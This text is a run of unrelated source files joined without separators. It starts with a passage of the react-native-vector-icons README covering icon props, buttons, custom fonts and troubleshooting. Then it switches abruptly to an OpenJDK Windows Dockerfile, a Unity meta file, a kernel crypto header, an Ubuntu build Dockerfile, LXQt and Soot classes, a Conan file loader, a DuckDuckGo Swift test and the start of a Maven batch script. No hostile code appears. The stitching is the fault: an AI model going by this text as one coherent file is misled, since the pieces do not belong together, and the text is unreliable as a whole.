| **`size`** | Size of the icon, can also be passed as `fontSize` in the style object. | `12` |
| **`name`** | What icon to show, see Icon Explorer app or one of the links above. | _None_ |
| **`color`** | Color of the icon. | _Inherited_ |
### Static Methods
| Prop | Description |
| ------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **`getFontFamily`** | Returns the font family that is currently used to retrieve icons as text. Usage: `const fontFamily = Icon.getFontFamily()` |
| **`getImageSource`**     | Returns a promise that resolves to the source of a bitmap version of the icon for use with the `Image` component et al. Usage: `const source = await Icon.getImageSource(name, size, color)` |
| **`getImageSourceSync`** | Same as `getImageSource` but synchronous. Usage: `const source = Icon.getImageSourceSync(name, size, color)` |
| **`getRawGlyphMap`** | Returns the raw glyph map of the icon set. Usage: `const glyphMap = Icon.getRawGlyphMap()` |
| **`hasIcon`** | Checks if the name is valid in current icon set. Usage: `const isNameValid = Icon.hasIcon(name)` |
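For instance, here is a minimal sketch combining a few of these methods, based on the usage strings above (the `rocket` icon name and the colour are illustrative):

```js
import Icon from 'react-native-vector-icons/FontAwesome';

// Font family string, handy when styling a plain Text component with icon glyphs
const fontFamily = Icon.getFontFamily();

// Guard against invalid names before asking for a bitmap version
if (Icon.hasIcon('rocket')) {
  Icon.getImageSource('rocket', 30, '#900').then(source => {
    // `source` can be passed to an <Image source={source} /> component
    console.log(fontFamily, source);
  });
}
```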
### Styling
Since `Icon` builds on top of the `Text` component, most [style properties](https://reactnative.dev/docs/style.html) will work as expected; you might find it useful to play around with these:
- `backgroundColor`
- `borderWidth`
- `borderColor`
- `borderRadius`
- `padding`
- `margin`
- `color`
- `fontSize`
NOTE: On Android, `Text` doesn't currently support `border*` styles; to work around this, simply wrap your `Icon` in a `View`.
By combining some of these you can create, for example:


## `Icon.Button` Component
A convenience component for creating buttons with an icon on the left side.
```js
import Icon from 'react-native-vector-icons/FontAwesome';
const myButton = (
<Icon.Button
name="facebook"
backgroundColor="#3b5998"
onPress={this.loginWithFacebook}
>
Login with Facebook
</Icon.Button>
);
const customTextButton = (
<Icon.Button name="facebook" backgroundColor="#3b5998">
<Text style={{ fontFamily: 'Arial', fontSize: 15 }}>
Login with Facebook
</Text>
</Icon.Button>
);
```

### Properties
Any [`Text`](https://reactnative.dev/docs/text.html), [`TouchableHighlight`](https://reactnative.dev/docs/touchablehighlight.html) or [`TouchableWithoutFeedback`](https://reactnative.dev/docs/touchablewithoutfeedback.html) property in addition to these:
| Prop | Description | Default |
| --------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------- |
| **`color`** | Text and icon color, use `iconStyle` or nest a `Text` component if you need different colors. | `white` |
| **`size`** | Icon size. | `20` |
| **`iconStyle`** | Styles applied to the icon only, good for setting margins or a different color. _Note: use `iconStyle` for margins or expect unstable behaviour._ | `{marginRight: 10}` |
| **`backgroundColor`** | Background color of the button. | `#007AFF` |
| **`borderRadius`** | Border radius of the button, set to `0` to disable. | `5` |
| **`onPress`** | A function called when the button is pressed. | _None_ |
## Usage as PNG image/source object
A convenient way to plug this into other components that rely on bitmap images rather than scalable vector icons. Takes the arguments `name`, `size` and `color` as described above.
```js
Icon.getImageSource('user', 20, 'red').then(source =>
this.setState({ userIcon: source })
);
```
Alternatively you may use the synchronous method `Icon.getImageSourceSync` to avoid rendering glitches. Keep in mind that this method is blocking and might incur performance penalties; subsequent calls will use the cache, however.
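A minimal sketch of the synchronous variant (the `user` icon name and colour are illustrative):

```js
import Icon from 'react-native-vector-icons/FontAwesome';

// Blocking call: returns the source object immediately; later calls hit the cache
const userIcon = Icon.getImageSourceSync('user', 20, 'red');
// `userIcon` can now be used wherever an Image source object is expected
```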
For a complete example check out the `TabBarExample` project.
## Usage with [TabBarIOS](https://reactnative.dev/docs/tabbarios.html)
Simply use `Icon.TabBarItemIOS` instead of `TabBarIOS.Item`. This is an extended component that works exactly the same but with the following additional properties:
| Prop | Description | Default |
| ----------------------- | ----------------------------------------------------------------------- | ------------- |
| **`iconName`** | Name of the default icon (similar to `TabBarIOS.Item` `icon`) | _None_ |
| **`selectedIconName`** | Name of the selected icon (similar to `TabBarIOS.Item` `selectedIcon`). | _`iconName`_ |
| **`iconSize`** | Size of the icon. | `30` |
| **`iconColor`** | Color of the icon. | _None_ |
| **`selectedIconColor`** | Color of the selected icon. | _`iconColor`_ |
For example usage see `Examples/TabBarExample` or the examples section below. Don't forget to import and link to this project as described above if you are going to use the TabBar integration.
**Note:** using `iconColor` and `selectedIconColor` requires the attribute [renderAsOriginal](https://reactnative.dev/docs/tabbarios-item.html#renderasoriginal) to be set to `true` on `Icon.TabBarItemIOS`.
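As a quick sketch of these properties together (icon names are Ionicons-style examples; see the examples section below for a full project):

```js
import Icon from 'react-native-vector-icons/Ionicons';

const homeTab = (
  <Icon.TabBarItemIOS
    title="Home"
    iconName="ios-home-outline"
    selectedIconName="ios-home"
    iconColor="#95a5a6"
    selectedIconColor="#4F8EF7"
    renderAsOriginal
  >
    {/* tab content goes here */}
  </Icon.TabBarItemIOS>
);
```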
# Multi-style fonts
Some fonts today use multiple styles, for example FontAwesome 5, and this library supports them. The usage is pretty much the same as with the standard `Icon` component:
```jsx
import Icon from 'react-native-vector-icons/FontAwesome5';
const myIcon1 = <Icon name="comments" size={30} color="#900" />; // Defaults to regular
const myIcon2 = <Icon name="comments" size={30} color="#900" solid />;
const myIcon3 = <Icon name="comments" size={30} color="#900" light />; // Only in FA5 Pro
```
### Static methods
All static methods from `Icon` are supported by multi-styled fonts.
| Prop | Description |
| ------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **`getFontFamily`** | Returns the font family that is currently used to retrieve icons as text. Usage: `const fontFamily = Icon.getFontFamily(style)` |
| **`getImageSource`**     | Returns a promise that resolves to the source of a bitmap version of the icon for use with the `Image` component et al. Usage: `const source = await Icon.getImageSource(name, size, color)` |
| **`getImageSourceSync`** | Same as `getImageSource` but synchronous. Usage: `const source = Icon.getImageSourceSync(name, size, color)` |
| **`getRawGlyphMap`** | Returns the raw glyph map of the icon set. Usage: `const glyphMap = Icon.getRawGlyphMap(style)` |
| **`hasIcon`** | Checks if the name is valid in current icon set. Usage: `const isNameValid = Icon.hasIcon(name, style)` |
| **`getStyledIconSet`**   | Use this to get an `Icon` component for a single style. Usage: `const StyledIcon = Icon.getStyledIconSet(style)` |
If no style argument is passed (or if it's invalid) the methods will default to a pre-defined fallback.
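For example, a hedged sketch of pinning a component to one style with `getStyledIconSet` (the `'solid'` style token is an assumption here; check the FontAwesome 5 guide for the exact tokens):

```js
import Icon from 'react-native-vector-icons/FontAwesome5';

// Locks the returned component to one style; a missing or invalid argument
// falls back to the pre-defined default mentioned above.
const SolidIcon = Icon.getStyledIconSet('solid');
const myIcon = <SolidIcon name="comments" size={30} color="#900" />;
```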
### Components
`Icon.Button`, `Icon.TabBarItem`, `Icon.TabBarItemIOS` are all supported, usage is just like `Icon`:
```jsx
import Icon from 'react-native-vector-icons/FontAwesome5';
const myButton = (
<Icon.Button name="facebook" onPress={this.loginWithFacebook} solid>
Login with Facebook
</Icon.Button>
);
```
## Custom Fonts
### `createIconSet(glyphMap, fontFamily[, fontFile])`
Returns your own custom font based on the `glyphMap` where the key is the icon name and the value is either a UTF-8 character or its character code. `fontFamily` is the name of the font, **NOT** the filename. Open the font in Font Book.app or similar to learn the name. Optionally pass the third `fontFile` argument for Android support; it should be the custom font file name.
```js
import { createIconSet } from 'react-native-vector-icons';
const glyphMap = { 'icon-name': 1234, test: '∆' };
const Icon = createIconSet(glyphMap, 'FontName', 'font-name.ttf');
```
### `createIconSetFromFontello(config[, fontFamily[, fontFile]])`
Convenience method to create a custom font based on a [fontello](http://fontello.com) config file. Don't forget to import the font as described above and drop the `config.json` somewhere convenient in your project.
```js
import { createIconSetFromFontello } from 'react-native-vector-icons';
import fontelloConfig from './config.json';
const Icon = createIconSetFromFontello(fontelloConfig);
```
### `createIconSetFromIcoMoon(config[, fontFamily[, fontFile]])`
```js
import { createIconSetFromIcoMoon } from 'react-native-vector-icons';
import icoMoonConfig from './selection.json';
const Icon = createIconSetFromIcoMoon(
icoMoonConfig,
'LineAwesome',
'line-awesome.ttf'
);
```
Make sure you're using the _Download_ option in [IcoMoon](https://icomoon.io/app), and use the `.json` file that's included in the `.zip` you've downloaded. You'll also need to import the `.ttf` font file into your project, following the instructions above.
### `createMultiStyleIconSet(styles [, options])`
```jsx
import { createMultiStyleIconSet } from 'react-native-vector-icons';
/*
* This is just example code, you are free to
* design your glyphmap and styles to your liking
*/
import glyphmap from './glyphmap.json';
/*
* glyphmap = {
* "style1": [
* "hello",
* "world"
* ],
* "style2": [
* "foo",
* "bar"
* ]
* }
*/
const glyphKeys = Object.keys(glyphmap); /* ["style1", "style2"] */
const options = {
defaultStyle: 'style1',
glyphValidator: (name, style) => glyphmap[style] != null && glyphmap[style].indexOf(name) !== -1,
fallbackFamily: (name) => {
for (let i = 0; i < glyphKeys.length; i++) {
const style = glyphKeys[i];
if (glyphmap[style].indexOf(name) !== -1) {
return style;
}
}
/* Always return some family */
return glyphKeys[0];
}
};
/*
* The styles object consists of keys, which will be
* used as the styles later, and objects which are
* used as style objects for the font. The style
* should have unique characteristics for each font
* in order to ensure that the right one will be
* chosen. FontAwesome 5 uses font weight since
* 5.7.0 in order to differentiate the styles but
* other properties (like fontFamily) can be used.
* It's just a standard RN style object.
*/
const styles = {
style1: {
fontWeight: '700'
},
style2: {
fontWeight: '100'
}
};
const Icon = createMultiStyleIconSet(styles, options);
/* Uses default style (style1) */
<Icon name={'hello'} />
<Icon name={'world'} style1 />
/* Default style is style1 but this will fall back to style2 */
<Icon name={'foo'} />
/* This will also fall back to style2 */
<Icon name={'foo'} style1 />
/* Regular use of style2 */
<Icon name={'bar'} style2 />
```
| option | Description | default |
| -------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------- |
| defaultStyle | The name of the style to be used if no style is supplied during rendering. | `Object.keys(styles)[0]` |
| fallbackFamily | Function for selecting a family if a glyph is not available. The function should accept the `name` of the glyph as a parameter. Returns the name of the family. | `(name) => Object.keys(styles)[0]` |
| glyphValidator | Function for validating that a glyph is available for a chosen style. It has `name` and `style` as parameters, in that order. Returns `true` if the glyph is valid or `false` if it's not. | `(name, style) => true` |
#### iOS
You have to manually add a reference to your `.ttf` in your Xcode project's `Resources` folder and in `Info.plist`.
## Animation
React Native comes with an amazing animation library called [`Animated`](https://reactnative.dev/docs/animated.html). To use it with an icon, simply create an animated component with this line: `const AnimatedIcon = Animated.createAnimatedComponent(Icon)`. You can also use the higher level animation library [react-native-animatable](https://github.com/oblador/react-native-animatable).
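A minimal sketch of the `Animated` approach (the looping fade and the `heart` icon are just examples):

```js
import React, { useEffect, useRef } from 'react';
import { Animated } from 'react-native';
import Icon from 'react-native-vector-icons/FontAwesome';

const AnimatedIcon = Animated.createAnimatedComponent(Icon);

function PulsingIcon() {
  const opacity = useRef(new Animated.Value(0)).current;

  useEffect(() => {
    // Fade the icon in and out forever
    Animated.loop(
      Animated.sequence([
        Animated.timing(opacity, { toValue: 1, duration: 500, useNativeDriver: true }),
        Animated.timing(opacity, { toValue: 0, duration: 500, useNativeDriver: true }),
      ])
    ).start();
  }, [opacity]);

  return <AnimatedIcon name="heart" size={30} color="#900" style={{ opacity }} />;
}
```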
## Examples
### IconExplorer
Try the `IconExplorer` project in the `Examples/IconExplorer` folder, where you can also search for any icon.

### Basic Example
```js
import Icon from 'react-native-vector-icons/Ionicons';
function ExampleView(props) {
return <Icon name="ios-person" size={30} color="#4F8EF7" />;
}
```
### TabBarIOS
Full example in `TabBarExample` project in `Examples/TabBarExample` folder.
```js
import { View, Text, TabBarIOS } from 'react-native';
import Icon from 'react-native-vector-icons/Ionicons';
function TabBarView(props) {
return (
<TabBarIOS>
<Icon.TabBarItem
title="Home"
iconName="ios-home-outline"
selectedIconName="ios-home"
>
<View style={styles.tabContent}>
<Text>Home Tab</Text>
</View>
</Icon.TabBarItem>
</TabBarIOS>
);
}
```
### ToolbarAndroid
Since [`ToolbarAndroid`](https://github.com/react-native-community/toolbar-android) was removed from core, it is also removed as a convenience component from this library. Simply use `getImageSourceSync` instead, but don't forget to import and link to this project as described above first.
```js
import ToolbarAndroid from '@react-native-community/toolbar-android';
import Icon from 'react-native-vector-icons/Ionicons';
const navIcon = Icon.getImageSourceSync('md-arrow-back', 24, 'white');
const overflowIcon = Icon.getImageSourceSync('md-more', 24, 'white');
const settingsIcon = Icon.getImageSourceSync('md-settings', 30, 'white');
const twitterIcon = Icon.getImageSourceSync('logo-twitter', 25, '#4099FF');
function ToolbarView(props) {
return (
<ToolbarAndroid
title="Home"
titleColor="white"
navIcon={navIcon}
onIconClicked={props.navigator.pop}
actions={[
{
title: 'Settings',
icon: settingsIcon,
show: 'always',
},
{
title: 'Follow me on Twitter',
icon: twitterIcon,
show: 'ifRoom',
},
]}
overflowIcon={overflowIcon}
/>
);
}
```
### Inline Icons
```js
import { Text } from 'react-native';
import Icon from 'react-native-vector-icons/Ionicons';
function ExampleView(props) {
return (
<Text>
Lorem <Icon name="ios-book" color="#4F8EF7" /> Ipsum
</Text>
);
}
```
### Community examples
- [react-native-dribbble-app](https://github.com/catalinmiron/react-native-dribbble-app)
- [product-kitty](https://github.com/rkho/product-kitty) ([blog post](http://richardkho.com/persisting-tabbars-in-react-native/))
- [react-native-netflix](https://github.com/mariodev12/react-native-netflix)
## Generating your own icon set from a CSS file
If you already have an icon font with an associated CSS file, then you can easily generate an icon set with the `generate-icon` script.
### Example usage:
```
./node_modules/.bin/generate-icon path/to/styles.css --componentName=MyIcon --fontFamily=myicon > Components/MyIcon.js
```
### Options
Any flags not listed below, like `--componentName` and `--fontFamily`, will be passed on to the template.
#### `-p`, `--prefix`
CSS selector prefix [default: ".icon-"]
#### `-t`, `--template`
Template in lodash format [default: "./template/iconSet.tpl"]
For default template please provide `--componentName` and `--fontFamily`.
#### `-o`, `--output`
Save output to file, defaults to STDOUT
## [Changelog](https://github.com/oblador/react-native-vector-icons/releases)
## Troubleshooting
#### The icons show up as a crossed out box on Android
- Make sure you've copied the font to `android/app/src/main/assets/fonts`.
- Delete the build folder with `rm -rf android/app/build`.
- Recompile the project.
#### Red screen with "Unrecognized font family" error on iOS
- Make sure you've manually added a reference to your `.ttf` in your Xcode project's `Resources` folder.
- Check that the font you are trying to use appears in `Info.plist`, if you've added the whole folder and it's blue in color, then you need to add it to the path.
- Check that the font is copied in the _Copy Bundle Resources_ in _Build Phases_.
- Delete the build folder with `rm -rf ios/build`
- Recompile the project.
#### Android build fails on Windows for no good reason
Both npm and Android file hierarchies tend to get very deep, and it gets even worse when you combine them. Since the Windows file system has a maximum path length, long file paths will result in numerous errors, including `Execution failed for task ':react-native-vector-icons:processReleaseResources'`. So try to keep the path to your project folder as short as possible.
#### Wrong icons are shown after upgrading this package
You probably didn't update the font files linked to your native project after upgrading. However, this only applies to Android targets since iOS bundles the fonts when building the app (try to clean your build from Xcode if the problem exists). On Android you can relink the project or manually update the fonts. To have them automatically synced, use the [gradle approach](https://github.com/oblador/react-native-vector-icons#option-with-gradle-recommended).
#### Some icons are missing after upgrading this package
Sometimes vendors decide to remove some icons from newer releases; this has nothing to do with this package. If you depend on an older version of a font, you can add it as a [custom font](#custom-fonts).
## License
This project is licensed under the [MIT License](http://opensource.org/licenses/mit-license.html).
Any bundled fonts are copyright to their respective authors and mostly under MIT or [SIL OFL](http://scripts.sil.org/OFL).
# ------------------------------------------------------------------------------
# NOTE: THIS DOCKERFILE IS GENERATED VIA "build_latest.sh" or "update_multiarch.sh"
#
# PLEASE DO NOT EDIT IT DIRECTLY.
# ------------------------------------------------------------------------------
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
FROM mcr.microsoft.com/windows/servercore:1909
# $ProgressPreference: https://github.com/PowerShell/PowerShell/issues/2138#issuecomment-251261324
SHELL ["powershell", "-Command", "$ErrorActionPreference = 'Stop'; $ProgressPreference = 'SilentlyContinue';"]
ENV JAVA_VERSION jdk8u
RUN Write-Host ('Downloading https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/jdk8u-2020-09-26-11-07/OpenJDK8U-jre_x64_windows_openj9_2020-09-26-11-07.msi ...'); \
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; \
wget https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/jdk8u-2020-09-26-11-07/OpenJDK8U-jre_x64_windows_openj9_2020-09-26-11-07.msi -O 'openjdk.msi'; \
Write-Host ('Verifying sha256 (6da5207d7a068baf849bd7af591a915425bf5010e63652f9be45bdea3158a81f) ...'); \
if ((Get-FileHash openjdk.msi -Algorithm sha256).Hash -ne '6da5207d7a068baf849bd7af591a915425bf5010e63652f9be45bdea3158a81f') { \
Write-Host 'FAILED!'; \
exit 1; \
}; \
\
New-Item -ItemType Directory -Path C:\temp | Out-Null; \
\
Write-Host 'Installing using MSI ...'; \
Start-Process -FilePath "msiexec.exe" -ArgumentList '/i', 'openjdk.msi', '/L*V', 'C:\temp\OpenJDK.log', \
'/quiet', 'ADDLOCAL=FeatureEnvironment,FeatureJarFileRunWith,FeatureJavaHome' -Wait -Passthru; \
Remove-Item -Path C:\temp -Recurse | Out-Null; \
Write-Host 'Removing openjdk.msi ...'; \
Remove-Item openjdk.msi -Force
ENV JAVA_TOOL_OPTIONS="-XX:+IgnoreUnrecognizedVMOptions -XX:+UseContainerSupport -XX:+IdleTuningCompactOnIdle -XX:+IdleTuningGcOnIdle"
fileFormatVersion: 2
guid: 973c73f34132a1a4bbad8414c56117de
folderAsset: yes
timeCreated: 1435661090
licenseType: Store
DefaultImporter:
userData:
assetBundleName:
assetBundleVariant:
/* Public key algorithm internals
*
* See Documentation/crypto/asymmetric-keys.txt
*
* Copyright (C) 2012 Red Hat, Inc. All Rights Reserved.
* Written by David Howells ([email protected])
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public Licence
* as published by the Free Software Foundation; either version
* 2 of the Licence, or (at your option) any later version.
*/
#include <crypto/public_key.h>
extern struct asymmetric_key_subtype public_key_subtype;
/*
* Public key algorithm definition.
*/
struct public_key_algorithm {
const char *name;
u8 n_pub_mpi; /* Number of MPIs in public key */
u8 n_sec_mpi; /* Number of MPIs in secret key */
u8 n_sig_mpi; /* Number of MPIs in a signature */
int (*verify_signature)(const struct public_key *key,
const struct public_key_signature *sig);
};
extern const struct public_key_algorithm RSA_public_key_algorithm;
ARG ARCH
FROM ${ARCH}ubuntu:bionic
WORKDIR /workdir
RUN sed -i s,http://archive.ubuntu.com/ubuntu/,mirror://mirrors.ubuntu.com/mirrors.txt, /etc/apt/sources.list \
&& apt-get update \
&& apt-get -qyy --no-install-recommends install git gcc-4.8 gcc-5 gcc-6 gcc-7 gcc-8 clang-3.9 clang-4.0 clang-5.0 clang-6.0 clang-7 gcc-mingw-w64-x86-64 gcc-mingw-w64-i686 make ca-certificates autoconf automake libtool pkg-config libhdf5-dev \
&& apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* /workdir/*
RUN apt-get update \
&& apt-get -qyy --install-recommends install gcc-arm-linux-gnueabi \
&& apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* /workdir/*
/* BEGIN_COMMON_COPYRIGHT_HEADER
* (c)LGPL2+
*
* LXQt - a lightweight, Qt based, desktop toolset
* https://lxqt.org
*
* Copyright: 2013 Razor team
* Authors:
* Alexander Sokoloff <[email protected]>
*
* This program or library is free software; you can redistribute it
* and/or modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
* You should have received a copy of the GNU Lesser General
* Public License along with this library; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301 USA
*
* END_COMMON_COPYRIGHT_HEADER */
#ifndef LXQT_PLUGIN_MOUNT_DEVICEACTION_INFO_H
#define LXQT_PLUGIN_MOUNT_DEVICEACTION_INFO_H
#include "deviceaction.h"
#include <QWidget>
#include <QTimer>
class Popup;
class DeviceActionInfo : public DeviceAction
{
Q_OBJECT
public:
explicit DeviceActionInfo(LXQtMountPlugin *plugin, QObject *parent = nullptr);
virtual ActionId Type() const throw () { return ActionInfo; }
protected:
void doDeviceAdded(Solid::Device device);
void doDeviceRemoved(Solid::Device device);
private:
void showMessage(const QString &text);
};
#endif // LXQT_PLUGIN_MOUNT_DEVICEACTION_INFO_H
try {
Object.assign(global, require('../build.config'));
// tslint:disable-next-line
const modules = require('./modules').default;
(async () => {
await modules.createApp(module);
})();
} catch (e) {
if (typeof ErrorUtils !== 'undefined') {
(ErrorUtils as any).reportFatalError(e);
} else {
console.error(e);
}
}
ks.type = "sparql"
ks.url = "http://live.dbpedia.org/sparql"
ks.defaultGraphURIs = {"http://dbpedia.org"}
alg.type = "objectproperty range learner"
alg.source = component:ks
alg.propertyToDescribe = "http://dbpedia.org/ontology/leader"
/* Soot - a Java Optimization Framework
* Copyright (C) 2012 Michael Markert, Frank Hartmann
*
* (c) 2012 University of Luxembourg - Interdisciplinary Centre for
* Security Reliability and Trust (SnT) - All rights reserved
* Alexandre Bartel
*
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 02111-1307, USA.
*/
package soot.dexpler.instructions;
import org.jf.dexlib2.iface.instruction.Instruction;
import org.jf.dexlib2.iface.instruction.formats.Instruction11x;
import soot.Local;
import soot.dexpler.Debug;
import soot.dexpler.DexBody;
import soot.dexpler.IDalvikTyper;
import soot.dexpler.typing.DalvikTyper;
import soot.jimple.Jimple;
import soot.jimple.ReturnStmt;
public class ReturnInstruction extends DexlibAbstractInstruction {
ReturnStmt returnStmt = null;
public ReturnInstruction (Instruction instruction, int codeAddress) {
super(instruction, codeAddress);
}
public void jimplify (DexBody body) {
Instruction11x returnInstruction = (Instruction11x) this.instruction;
Local l = body.getRegisterLocal(returnInstruction.getRegisterA());
returnStmt = Jimple.v().newReturnStmt(l);
setUnit(returnStmt);
addTags(returnStmt);
body.add(returnStmt);
if (IDalvikTyper.ENABLE_DVKTYPER) {
Debug.printDbg(IDalvikTyper.DEBUG, "constraint: "+ returnStmt);
DalvikTyper.v().setType(returnStmt.getOpBox(), body.getBody().getMethod().getReturnType(), true);
}
}
}
from conans.errors import ConanException
from conans.util.config_parser import ConfigParser
class ConanFileTextLoader(object):
"""Parse a conanfile.txt file"""
def __init__(self, input_text):
# Prefer composition over inheritance, the __getattr__ was breaking things
self._config_parser = ConfigParser(input_text, ["requires", "generators", "options",
"imports", "build_requires"],
parse_lines=True)
@property
def requirements(self):
"""returns a list of requires
EX: "OpenCV/2.4.10@phil/stable"
"""
return [r.strip() for r in self._config_parser.requires.splitlines()]
@property
def build_requirements(self):
"""returns a list of build_requires
EX: "OpenCV/2.4.10@phil/stable"
"""
return [r.strip() for r in self._config_parser.build_requires.splitlines()]
@property
def options(self):
return self._config_parser.options
@property
def _import_parameters(self):
def _parse_args(param_string):
root_package, ignore_case, folder, excludes, keep_path = None, False, False, None, True
params = param_string.split(",")
params = [p.strip() for p in params if p.strip()]
for param in params:
try:
var, value = param.split("=")
except ValueError:
raise ConanException("Wrong imports argument '%s'. "
"Need a 'arg=value' pair." % param)
var = var.strip()
value = value.strip()
if var == "root_package":
root_package = value
elif var == "ignore_case":
ignore_case = (value.lower() == "true")
elif var == "folder":
folder = (value.lower() == "true")
elif var == "excludes":
excludes = value.split()
elif var == "keep_path":
keep_path = (value.lower() == "true")
else:
raise ConanException("Invalid imports. Unknown argument %s" % var)
return root_package, ignore_case, folder, excludes, keep_path
def _parse_import(line):
try:
pair = line.split("->", 1)
source = pair[0].strip().split(',', 1)
dest = pair[1].strip()
src, pattern = source[0].strip(), source[1].strip()
return pattern, dest, src
except Exception:
raise ConanException("Wrong imports line: %s\n"
"Use syntax: path, pattern -> local-folder" % line)
ret = []
local_install_text = self._config_parser.imports
for line in local_install_text.splitlines():
# discard blanks, comments, and discard trailing comments
line = line.strip()
if not line or line.startswith("#"):
continue
line = line.split("#", 1)[0]
invalid_line_msg = "Invalid imports line: %s\nEX: OpenCV/lib, * -> ./lib" % line
if line.startswith("/") or line.startswith(".."):
raise ConanException("%s\n%s" % (invalid_line_msg,
"Import's paths can't begin with '/' or '..'"))
try:
tokens = line.rsplit("@", 1)
if len(tokens) > 1:
line = tokens[0]
params = tokens[1]
else:
params = ""
root_package, ignore_case, folder, excludes, keep_path = _parse_args(params)
pattern, dest, src = _parse_import(line)
ret.append((pattern, dest, src, root_package, folder, ignore_case, excludes,
keep_path))
except Exception as e:
raise ConanException("%s\n%s" % (invalid_line_msg, str(e)))
return ret
@property
def generators(self):
return self._config_parser.generators.splitlines()
def imports_method(self, conan_file):
parameters = self._import_parameters
def imports():
for import_params in parameters:
conan_file.copy(*import_params)
return imports
//
// HomeRowReminderTests.swift
// DuckDuckGo
//
// Copyright © 2018 DuckDuckGo. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
import XCTest
@testable import Core
@testable import DuckDuckGo
class HomeRowReminderTests: XCTestCase {
var storage: MockHomeRowReminderStorage!
override func setUp() {
storage = MockHomeRowReminderStorage()
}
func testWhenFeatureFirstAccessedThenDateIsStored() {
let feature = HomeRowReminder(storage: storage)
_ = feature.showNow(isDefaultBrowserSupported: false)
XCTAssertNotNil(storage.firstAccessDate)
}
func testWhenTimeHasElapsedAndAlreadyShownThenDontShow() {
setReminderTimeElapsed()
let feature = HomeRowReminder(storage: storage)
feature.setShown()
XCTAssertFalse(feature.showNow(isDefaultBrowserSupported: false))
}
func testWhenIsNewAndTimeHasElapsedThenShow() {
setReminderTimeElapsed()
let feature = HomeRowReminder(storage: storage)
XCTAssertTrue(feature.showNow(isDefaultBrowserSupported: false))
}
func testWhenIsNewAndTimeNotElapsedThenDontShow() {
let feature = HomeRowReminder(storage: storage)
XCTAssertFalse(feature.showNow(isDefaultBrowserSupported: false))
}
private func setReminderTimeElapsed() {
let threeAndABitDaysAgo = -(60 * 60 * 24 * HomeRowReminder.Constants.reminderTimeInDays * 1.1)
storage.firstAccessDate = Date(timeIntervalSinceNow: threeAndABitDaysAgo)
}
}
class MockHomeRowReminderStorage: HomeRowReminderStorage {
var firstAccessDate: Date?
var shown: Bool = false
}
@REM ----------------------------------------------------------------------------
@REM Licensed to the Apache Software Foundation (ASF) under one
@REM or more contributor license agreements. See the NOTICE file
@REM distributed with this work for additional information
@REM regarding copyright ownership. The ASF licenses this file
@REM to you under the Apache License, Version 2.0 (the
@REM "License"); you may not use this file except in compliance
@REM with the License. You may obtain a copy of the License at
@REM
@REM https://www.apache.org/licenses/LICENSE-2.0
@REM
@REM Unless required by applicable law or agreed to in writing,
@REM software distributed under the License is distributed on an
@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
@REM KIND, either express or implied. See the License for the
@REM specific language governing permissions and limitations
@REM under the License.
@REM ----------------------------------------------------------------------------
@REM ----------------------------------------------------------------------------
@REM Maven2 Start Up Batch script
@REM
@REM Required ENV vars:
@REM JAVA_HOME - location of a JDK home dir
@REM
@REM Optional ENV vars
@REM M2_HOME - location of maven2's installed home dir
@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a key stroke before ending
@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
@REM e.g. to debug Maven itself, use
@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
@REM ----------------------------------------------------------------------------
@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
@echo off
@REM set title of command window
title %0
@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO%
@REM set %HOME% to equivalent of $HOME
if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
@REM Execute a user defined script before this one
if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
@REM check for pre script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat"
if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd"
:skipRcPre
@setlocal
